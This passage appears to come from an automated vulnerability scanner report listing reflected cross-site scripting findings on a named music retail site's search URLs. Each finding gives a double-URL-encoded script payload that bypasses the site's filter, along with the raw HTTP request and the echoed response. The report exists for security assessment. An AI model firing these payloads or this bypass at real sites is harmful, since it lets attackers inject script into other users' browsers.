The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cf9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84bb1fedb4e was submitted in the REST URL parameter 3. This input was echoed as 53cf9"><script>alert(1)</script>84bb1fedb4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nico%20Muhly53cf9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84bb1fedb4e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=l6p3cv1imqefak4ton388ihc96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:27 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=444541201; expires=Sun, 09-Jan-2011 02:40:27 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=546877534; expires=Sun, 09-Jan-2011 02:40:27 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nico Muhly53cf9"><script>alert(1)</script>84bb1fedb4e" />
...[SNIP]...

1.227. http://www.insound.com/search/query/Nightlands&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nightlands&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8da4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efcd4cf55567 was submitted in the REST URL parameter 3. This input was echoed as c8da4"><script>alert(1)</script>fcd4cf55567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nightlandsc8da4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efcd4cf55567&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=e3benklen2sgl53j9tvp78kdd3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=272408683; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=86529911; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nightlandsc8da4"><script>alert(1)</script>fcd4cf55567" />
...[SNIP]...

1.228. http://www.insound.com/search/query/Nightlands&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nightlands&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 345a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e329f1a03ae6 was submitted in the REST URL parameter 3. This input was echoed as 345a3</title><script>alert(1)</script>329f1a03ae6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nightlands345a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e329f1a03ae6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k5ccqe5hv59hv5bomlqlr71fb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=340767090; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=116862002; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nightlands345a3</title><script>alert(1)</script>329f1a03ae6</title>
...[SNIP]...

1.229. http://www.insound.com/search/query/Nine%20Inch%20Nails&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nine%20Inch%20Nails&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 85401%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb09a2bfb86 was submitted in the REST URL parameter 3. This input was echoed as 85401</title><script>alert(1)</script>b09a2bfb86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nine%20Inch%20Nails85401%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb09a2bfb86&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=djestl3vu3ai576ngidu1ui5t7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=461899030; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=150162151; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nine Inch Nails85401</title><script>alert(1)</script>b09a2bfb86</title>
...[SNIP]...

1.230. http://www.insound.com/search/query/Nine%20Inch%20Nails&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nine%20Inch%20Nails&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fafbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5df44c77e5 was submitted in the REST URL parameter 3. This input was echoed as fafbc"><script>alert(1)</script>f5df44c77e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nine%20Inch%20Nailsfafbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5df44c77e5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=sutnuagp5fgek2nj713irnjm61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=120030481; expires=Sun, 09-Jan-2011 02:37:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=116457734; expires=Sun, 09-Jan-2011 02:37:59 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nine Inch Nailsfafbc"><script>alert(1)</script>f5df44c77e5" />
...[SNIP]...

1.231. http://www.insound.com/search/query/No%20Age&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/No%20Age&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0c917716b01 was submitted in the REST URL parameter 3. This input was echoed as 1bca8"><script>alert(1)</script>0c917716b01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/No%20Age1bca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0c917716b01&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=135udoe5ivhka5bj4elabkpbe1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=120955501; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=50266843; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="No Age1bca8"><script>alert(1)</script>0c917716b01" />
...[SNIP]...

1.232. http://www.insound.com/search/query/No%20Age&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/No%20Age&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3830b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edc8c45dc071 was submitted in the REST URL parameter 3. This input was echoed as 3830b</title><script>alert(1)</script>dc8c45dc071 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/No%20Age3830b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edc8c45dc071&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rrol536cgedm4ga4n24gbv2tv0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=196307516; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=490835597; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>No Age3830b</title><script>alert(1)</script>dc8c45dc071</title>
...[SNIP]...

1.233. http://www.insound.com/search/query/OFF!&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/OFF!&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload aa06b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eabbbe1eaea6 was submitted in the REST URL parameter 3. This input was echoed as aa06b</title><script>alert(1)</script>abbbe1eaea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/OFF!aa06b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eabbbe1eaea6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=l5j16pq315q50g9r6hk5lrh1r6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=429767147; expires=Sun, 09-Jan-2011 02:37:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=324732839; expires=Sun, 09-Jan-2011 02:37:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>OFF!aa06b</title><script>alert(1)</script>abbbe1eaea6</title>
...[SNIP]...

1.234. http://www.insound.com/search/query/OFF!&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/OFF!&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e27ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5aa40188b8 was submitted in the REST URL parameter 3. This input was echoed as e27ad"><script>alert(1)</script>f5aa40188b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/OFF!e27ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5aa40188b8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=759gjndij0d05l7pordgl1a3i0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=549753661; expires=Sun, 09-Jan-2011 02:37:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=549325982; expires=Sun, 09-Jan-2011 02:37:09 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="OFF!e27ad"><script>alert(1)</script>f5aa40188b8" />
...[SNIP]...

1.235. http://www.insound.com/search/query/Orange%20Juice&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Orange%20Juice&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3b3ac%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4e01c33c46 was submitted in the REST URL parameter 3. This input was echoed as 3b3ac</title><script>alert(1)</script>d4e01c33c46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Orange%20Juice3b3ac%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4e01c33c46&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=nd9j4vdl6oo0k2amph4jit8og2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=315137184; expires=Sun, 09-Jan-2011 02:38:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=439268016; expires=Sun, 09-Jan-2011 02:38:09 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Orange Juice3b3ac</title><script>alert(1)</script>d4e01c33c46</title>
...[SNIP]...

1.236. http://www.insound.com/search/query/Orange%20Juice&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Orange%20Juice&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efb87%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e92227f002c8 was submitted in the REST URL parameter 3. This input was echoed as efb87"><script>alert(1)</script>92227f002c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Orange%20Juiceefb87%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e92227f002c8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ekk2h7uvn780el522nm5i9sk05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:03 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=342775868; expires=Sun, 09-Jan-2011 02:38:03 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=246604051; expires=Sun, 09-Jan-2011 02:38:03 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Orange Juiceefb87"><script>alert(1)</script>92227f002c8" />
...[SNIP]...

1.237. http://www.insound.com/search/query/PJ%20Harvey&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/PJ%20Harvey&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b0484%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e980e1e0e4cd was submitted in the REST URL parameter 3. This input was echoed as b0484</title><script>alert(1)</script>980e1e0e4cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/PJ%20Harveyb0484%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e980e1e0e4cd&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=hup9s7p02s08bnl0d492fjjve1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=415617196; expires=Sun, 09-Jan-2011 02:37:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=151000379; expires=Sun, 09-Jan-2011 02:37:51 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
